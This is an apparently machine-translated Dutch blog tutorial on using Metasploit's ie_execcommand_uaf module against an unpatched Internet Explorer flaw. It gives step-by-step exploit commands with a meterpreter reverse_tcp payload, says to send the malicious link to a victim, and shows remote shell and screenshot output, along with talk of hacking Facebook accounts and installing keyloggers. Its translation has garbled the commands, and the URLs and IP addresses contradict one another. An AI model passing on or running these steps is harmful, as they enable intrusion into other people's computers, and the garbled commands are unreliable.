Laatst bijgewerkt: 17 mei 2024
Er is zojuist een nieuw beveiligingsprobleem ontdekt in Internet Explorer. Dit is een 0day-exploit, waarmee een aanvaller verbinding kan maken met een externe machine. Versies 6 tot 9 van de Internet Explorer-browser hebben last van het probleem, behalve dat versie 10 niet wordt beïnvloed.
We zijn benieuwd hoe lang het gaat duren Microsoft om een patch voor te stellen, terwijl meer dan 32% internetgebruikers gebruik de Internet Explorer-browser.
In de tussentijd zullen we zien hoe we deze fout kunnen misbruiken met Metasploit Framework.
De module waarmee deze fout kan worden uitgebuit, staat bekend als “ ie_execcommand_uaf ".
Hier zijn de commando's die je in Metasploit kunt gebruiken (hier: 192.168.1.2 is de server van de hacker, dus jij):
msf > gebruik exploit/windows/browser/ie_execcommand_uaf
msf > payload instellen windows/meterpreter/reverse_tcp
Hier laden we de “reverse_tcp” payload. Dit stukje shellcode wordt op de doelmachine uitgevoerd zodra de kwetsbaarheid is misbruikt. Er wordt dan een omgekeerde TCP-verbinding geïnitialiseerd waarmee u een sessie op afstand kunt openen (zelfs via een firewall).
msf > stel srvhost 192.168.1.2 in
msf > set uripath games (dit is de URL die voor de exploit wordt gebruikt)
Als de module correct is geconfigureerd, kunnen we de aanval lanceren:
[*] Reverse handler gestart op 192.168.1.100:4444
[*] URL gebruiken: http://192.168.1.2:8080/games
...
Er wordt dan een tijdelijke webserver gestart. Vervolgens moet u het adres van de pagina (http://192.168.1.2:8080/jeux) naar een slachtoffer sturen. Als ze op de link klikt, Metasploit zal je zoiets vertellen:
Het enige dat we nu hoeven te doen is een externe sessie op de machine openen met het commando:
[*] Interactie starten met 1
Nu kun je doen wat je wilt, zoals een screenshot van het bureaublad maken:
Extensie laden espi…succes.
meterpreter > screenshot capture.bmp
Of open een MS-DOS-dialoogvenster:
Proces 892 gemaakt.
Kanaal 1 gemaakt.
Microsoft Windows XP [Versie 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Documenten en instellingenAhmedDesktop>
of een Facebook-account hacken. Kortom, we kunnen echt doen wat we willen op het systeem (de pc uitzetten, een keylogger instellen, enz.).
Hulp nodig ? Stel je vraag, FunInformatique zal je antwoorden.